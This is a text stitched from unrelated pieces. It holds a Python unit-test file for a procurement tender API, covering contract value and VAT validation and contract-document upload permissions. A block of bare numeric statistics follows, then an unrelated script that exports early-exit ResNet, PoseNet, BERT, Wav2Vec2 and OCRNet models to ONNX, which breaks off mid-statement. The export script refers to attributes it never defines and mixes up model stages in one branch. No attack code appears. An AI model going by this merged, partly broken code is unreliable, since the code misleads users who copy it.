self.assertEqual(response.json["data"]["value"]["amount"], 100) self.assertEqual(response.json["data"]["value"]["amountNet"], 85) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"valueAddedTaxIncluded": False}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount and amountNet should be equal") def patch_tender_contract_value_vat_not_included(self): response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) contract = response.json["data"][0] response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"currency": "USD"}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Can't update currency for contract value") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 468}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount and amountNet should be equal") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 600, "amountNet": 600}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.json["errors"][0]["description"], "Amount should be less or equal to awarded amount") response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"amount": 400, "amountNet": 400}}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.json["data"]["value"]["amount"], 400) 
self.assertEqual(response.json["data"]["value"]["amountNet"], 400) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"value": {"valueAddedTaxIncluded": True}}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual( response.json["errors"][0]["description"], "Amount should be greater than amountNet and differ by no more than 20.0%", ) def get_tender_contract(self): self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = ("Basic", ("broker", "")) response = self.app.get("/tenders/{}/contracts/{}".format(self.tender_id, contract["id"])) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"], contract) response = self.app.get("/tenders/{}/contracts/some_id".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get("/tenders/some_id/contracts/some_id", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) def get_tender_contracts(self): self.app.authorization = ("Basic", ("token", "")) response = 
self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = ("Basic", ("broker", "")) response = self.app.get("/tenders/{}/contracts".format(self.tender_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["data"][-1], contract) response = self.app.get("/tenders/some_id/contracts", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) # Tender2LotContractResourceTest def lot2_patch_tender_contract(self): auth = self.app.authorization self.app.authorization = ("Basic", ("token", "")) response = self.app.post_json( "/tenders/{}/contracts".format(self.tender_id), {"data": {"title": "contract title", "description": "contract description", "awardID": self.award_id}}, ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") contract = response.json["data"] self.app.authorization = auth response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertIn("Can't sign contract before stand-still period end (", response.json["errors"][0]["description"]) self.set_status("complete", {"status": "active.awarded"}) response = self.app.post_json( 
"/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.patch_json( "/tenders/{}/contracts/{}?acc_token={}".format(self.tender_id, contract["id"], self.tender_token), {"data": {"status": "active"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update contract only in active lot status") # TenderContractDocumentResourceTest def not_found(self): response = self.app.post( "/tenders/some_id/contracts/some_id/documents?acc_token={}".format(self.tender_token), status=404, upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.post( "/tenders/{}/contracts/some_id/documents?acc_token={}".format(self.tender_id, self.tender_token), status=404, upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), status=404, upload_files=[("invalid_value", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") 
self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.get("/tenders/some_id/contracts/some_id/documents", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/some_id/documents".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get("/tenders/some_id/contracts/some_id/documents/some_id", status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.get("/tenders/{}/contracts/some_id/documents/some_id".format(self.tender_id), status=404) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.get( "/tenders/{}/contracts/{}/documents/some_id".format(self.tender_id, self.contract_id), status=404 ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not 
Found", u"location": u"url", u"name": u"document_id"}] ) response = self.app.put( "/tenders/some_id/contracts/some_id/documents/some_id?acc_token={}".format(self.tender_token), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"tender_id"}] ) response = self.app.put( "/tenders/{}/contracts/some_id/documents/some_id?acc_token={}".format(self.tender_id, self.tender_token), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"contract_id"}] ) response = self.app.put( "/tenders/{}/contracts/{}/documents/some_id?acc_token={}".format( self.tender_id, self.contract_id, self.tender_token ), status=404, upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"document_id"}] ) def create_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) self.assertEqual("name.doc", response.json["data"]["title"]) key = 
response.json["data"]["url"].split("?")[-1] response = self.app.get("/tenders/{}/contracts/{}/documents".format(self.tender_id, self.contract_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"][0]["id"]) self.assertEqual("name.doc", response.json["data"][0]["title"]) response = self.app.get("/tenders/{}/contracts/{}/documents?all=true".format(self.tender_id, self.contract_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"][0]["id"]) self.assertEqual("name.doc", response.json["data"][0]["title"]) response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?download=some_id".format(self.tender_id, self.contract_id, doc_id), status=404, ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual( response.json["errors"], [{u"description": u"Not Found", u"location": u"url", u"name": u"download"}] ) response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 7) self.assertEqual(response.body, "content") response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("name.doc", response.json["data"]["title"]) tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, 
self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't add document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't add document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) def put_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), status=404, upload_files=[("invalid_name", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), 
upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 8) self.assertEqual(response.body, "content2") response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("name.doc", response.json["data"]["title"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), "content3", content_type="application/msword", ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.get( "/tenders/{}/contracts/{}/documents/{}?{}".format(self.tender_id, self.contract_id, doc_id, key) ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/msword") self.assertEqual(response.content_length, 8) self.assertEqual(response.body, "content3") tender = self.db.get(self.tender_id) tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 
Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't update document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) def patch_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) response = self.app.get("/tenders/{}/contracts/{}/documents/{}".format(self.tender_id, self.contract_id, doc_id)) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) self.assertEqual("document description", response.json["data"]["description"]) tender = self.db.get(self.tender_id) 
tender["contracts"][-1]["status"] = "cancelled" self.db.save(tender) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can't update document in current contract status") self.set_status("{}".format(self.forbidden_contract_document_modification_actions_status)) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual( response.json["errors"][0]["description"], "Can't update document in current ({}) tender status".format( self.forbidden_contract_document_modification_actions_status ), ) # Tender2LotContractDocumentResourceTest def lot2_create_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) self.assertEqual("name.doc", response.json["data"]["title"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.post( 
"/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can add document only in active lot status") def lot2_put_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), status=404, upload_files=[("invalid_name", "name.doc", "content")], ) self.assertEqual(response.status, "404 Not Found") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["status"], "error") self.assertEqual(response.json["errors"], [{u"description": u"Not Found", u"location": u"body", u"name": u"file"}]) response = self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content2")], ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) key = response.json["data"]["url"].split("?")[-1] response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = 
self.app.put( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), upload_files=[("file", "name.doc", "content3")], status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update document only in active lot status") def lot2_patch_tender_contract_document(self): response = self.app.post( "/tenders/{}/contracts/{}/documents?acc_token={}".format(self.tender_id, self.contract_id, self.tender_token), upload_files=[("file", "name.doc", "content")], ) self.assertEqual(response.status, "201 Created") self.assertEqual(response.content_type, "application/json") doc_id = response.json["data"]["id"] self.assertIn(doc_id, response.headers["Location"]) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "document description"}}, ) self.assertEqual(response.status, "200 OK") self.assertEqual(response.content_type, "application/json") self.assertEqual(doc_id, response.json["data"]["id"]) response = self.app.post_json( "/tenders/{}/cancellations?acc_token={}".format(self.tender_id, self.tender_token), { "data": { "reason": "cancellation reason", "status": "active", "cancellationOf": "lot", "relatedLot": self.initial_lots[0]["id"], } }, ) response = self.app.patch_json( "/tenders/{}/contracts/{}/documents/{}?acc_token={}".format( self.tender_id, self.contract_id, doc_id, self.tender_token ), {"data": {"description": "new document description"}}, status=403, ) self.assertEqual(response.status, "403 Forbidden") self.assertEqual(response.content_type, "application/json") self.assertEqual(response.json["errors"][0]["description"], "Can update document only in active lot status")
43.144222
119
0.64522
5,665
49,659
5.540512
0.038129
0.142894
0.20518
0.089464
0.934686
0.924714
0.915443
0.904706
0.891484
0.886864
0
0.01526
0.177873
49,659
1,150
120
43.181739
0.753539
0.003081
0
0.699399
0
0
0.287394
0.08101
0
0
0
0
0.313627
1
0.016032
false
0
0.004008
0
0.02004
0
0
0
0
null
0
1
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
82f09aa73fe781698f4fa0075d5bfa6537287801
23,470
py
Python
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
1
2021-12-01T15:22:44.000Z
2021-12-01T15:22:44.000Z
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
null
null
null
Inference/src/exit_placement/model_export_v2.py
ZSL98/ETBA
618317698adb9e372fb11dc0c3a01f856e0759b0
[ "MIT" ]
null
null
null
import torch import torch.nn as nn from networks_v2 import resnet_s1, resnet_s2, posenet_s1, posenet_s2, backbone_s2, backbone_s3, backbone_init from transformers import Wav2Vec2FeatureExtractor, Wav2Vec2Processor, Wav2Vec2CTCTokenizer from wav2vec2_model import Wav2Vec2_with_exit_s1, Wav2Vec2_with_exit_s2, Wav2Vec2_with_dual_exit from modeling_bert import BertWithExit_s1, BertWithExit_s2, BertWithDualExit from ocrnet_with_exit import SpatialOCRNet_s1, SpatialOCRNet_s2, SpatialOCRNet import torchvision.models as models import copy model = models.resnet101(pretrained=True) class construct_net(object): def __init__(self, begin_point: int = 0, split_point: int = 0, backbone: str = 'resnet') -> None: super().__init__() self.backbone = backbone self.begin_point = begin_point self.split_point = split_point def construct_net_init(self): if self.backbone == 'resnet' or self.backbone == 'posenet': return backbone_init(layers=[3, 4, 23, 3], split_point_s1=self.begin_point, split_point_s2=self.begin_point, split_point_s3=self.begin_point) def construct_net_s1(self): if self.backbone == 'resnet': if self.begin_point == 0: return resnet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=True) else: return resnet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=False) elif self.backbone == 'posenet': if self.begin_point == 0: return posenet_s1(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=True) else: return posenet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, is_init=False) elif self.backbone == 'bert': if self.begin_point == 0: model = 
BertWithExit_s1.from_pretrained('bert-base-uncased') model.add_exit(start_point=self.split_point, end_point=self.split_point) return model else: model = BertWithDualExit.from_pretrained('bert-base-uncased') model.add_exit(num_hidden_layers=self.split_point) return model elif self.backbone == 'Wav2Vec2': tokenizer = Wav2Vec2CTCTokenizer("/home/slzhang/projects/ETBA/Inference/src/exit_placement/vocab.json", unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|") feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=False) processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer) if self.begin_point == 0: model_CTC = Wav2Vec2_with_exit_s1.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(start_point=self.split_point, end_point=self.split_point) else: model_CTC = Wav2Vec2_with_dual_exit.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(num_hidden_layers=self.split_point) return model_CTC elif self.backbone == 'openseg': return SpatialOCRNet_s1(self.start_point) def construct_net_s2(self): if self.backbone == 'resnet': return resnet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, ) elif self.backbone == 'posenet': return posenet_s2(layers=[3, 4, 23, 3], begin_point=self.begin_point, split_point_s1=self.split_point, split_point_s2=self.split_point, split_point_s3=self.split_point, ) elif self.backbone == 'bert': model = BertWithExit_s2.from_pretrained('bert-base-uncased') model.add_exit(end_point=self.begin_point+self.split_point) return model elif self.backbone == 'Wav2Vec2': tokenizer = 
Wav2Vec2CTCTokenizer("/home/slzhang/projects/ETBA/Inference/src/exit_placement/vocab.json", unk_token="[UNK]", pad_token="[PAD]", word_delimiter_token="|") feature_extractor = Wav2Vec2FeatureExtractor(feature_size=1, sampling_rate=16000, padding_value=0.0, do_normalize=True, return_attention_mask=False) processor = Wav2Vec2Processor(feature_extractor=feature_extractor, tokenizer=tokenizer) model_CTC = Wav2Vec2_with_exit_s2.from_pretrained( "facebook/wav2vec2-base", gradient_checkpointing=True, ctc_loss_reduction="mean", pad_token_id=processor.tokenizer.pad_token_id, ) model_CTC.add_exit(end_point=self.begin_point+self.split_point) return model_CTC elif self.backbone == 'openseg': return SpatialOCRNet_s2(self.start_point) def construct_net_s3(self): if self.backbone == 'resnet' or self.backbone == 'posenet': return backbone_s3(layers=[3, 4, 23, 3], split_point_s1=self.split_point_s1, split_point_s2=self.split_point_s2, split_point_s3=self.split_point_s3 ) def model_export_func(model_name, begin_point, split_point, exit_type=False): inst = construct_net(begin_point=begin_point, split_point=split_point, backbone = model_name) # dummy_input1 = torch.randn(1, 3, 513, 513) if inst.backbone == "resnet": dummy_input1 = torch.randn(1, 3, 224, 224) if begin_point != 0: model_init = inst.construct_net_init() model_init.eval() dummy_input1 = model_init(dummy_input1) dummy_input1 = dummy_input1[0] elif inst.backbone == "posenet": dummy_input1 = torch.randn(1, 3, 384, 384) if begin_point != 0: model_init = inst.construct_net_init() model_init.eval() dummy_input1 = model_init(dummy_input1) dummy_input1 = dummy_input1[0] elif inst.backbone == "openseg": dummy_input1 = torch.randn(1, 3, 1024, 2048) # dummy_input1 = torch.randn(1, 3, 384, 384) elif inst.backbone == "Wav2Vec2": dummy_input1 = torch.randn(1, 10000) if begin_point != 0: dummy_input1 = torch.randn(1, 31, 768) s1_model = inst.construct_net_s1() s1_model.eval() if inst.backbone == "resnet": dummy_input2 = 
s1_model(dummy_input1) dummy_input2 = dummy_input2[0] elif inst.backbone == "posenet": dummy_input2, x_exit = s1_model(dummy_input1) # dummy_input2 = dummy_input2[0] elif inst.backbone == "Wav2Vec2": dummy_input2 = torch.randn(1, 31, 768) elif inst.backbone == "openseg": # x_dsn, x, x_moveon = s1_model(dummy_input1) dummy_input2 = torch.randn(1, 1024, 129, 257) # dummy_input2 = torch.randn(1, 1024, 48, 48) # print(x_moveon.shape) s2_model = inst.construct_net_s2() s2_model.eval() # tmp_model = SpatialOCRNet() # tmp_model = model # s2_input_names = ["input"] # # s2_output_names = ["output_dsn", "output"] # s2_output_names = ["output"] # torch.onnx.export(tmp_model, dummy_input1, # "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s0.onnx", # input_names=s2_input_names, output_names=s2_output_names, # verbose=False,dynamic_axes={ # 'input': {0: 'batch_size'}, # 'output': {0: 'batch_size'}, # # 'output': {0: 'batch_size'}, # },opset_version=11) # exit() print("Begin point: " + str(begin_point)) print("Split point: " + str(split_point)) # print(dummy_input1.shape) # print(dummy_input2.shape) if inst.backbone == "resnet" or inst.backbone == "posenet" or inst.backbone == "Wav2Vec2": s1_input_names = ["input"] s1_output_names = ["output1", "exit_output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output1': {0: 'batch_size'}, 'exit_output': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["final_output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'final_output': {0: 'batch_size'}, 
},opset_version=11) elif inst.backbone == "openseg": s1_input_names = ["input"] # s1_output_names = ["output_dsn", "output", "x_moveon"] s1_output_names = ["output_dsn", "output"] torch.onnx.export(s1_model, dummy_input1, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s1.onnx", input_names=s1_input_names, output_names=s1_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, # 'x_moveon': {0: 'batch_size'}, },opset_version=11) s2_input_names = ["input"] s2_output_names = ["output_dsn", "output"] torch.onnx.export(s2_model, dummy_input2, "/home/slzhang/projects/ETBA/Inference/src/exit_placement/models/" + inst.backbone + "_s2.onnx", input_names=s2_input_names, output_names=s2_output_names, verbose=False,dynamic_axes={ 'input': {0: 'batch_size'}, 'output_dsn': {0: 'batch_size'}, 'output': {0: 'batch_size'}, },opset_version=11) elif inst.backbone == "bert": from transformers.convert_graph_to_onnx import load_graph_from_args, infer_shapes, ensure_valid_input pipeline_name = "feature-extraction" framework = "pt" model_name = "bert-base-uncased" tokenizer = "bert-base-uncased" nlp = 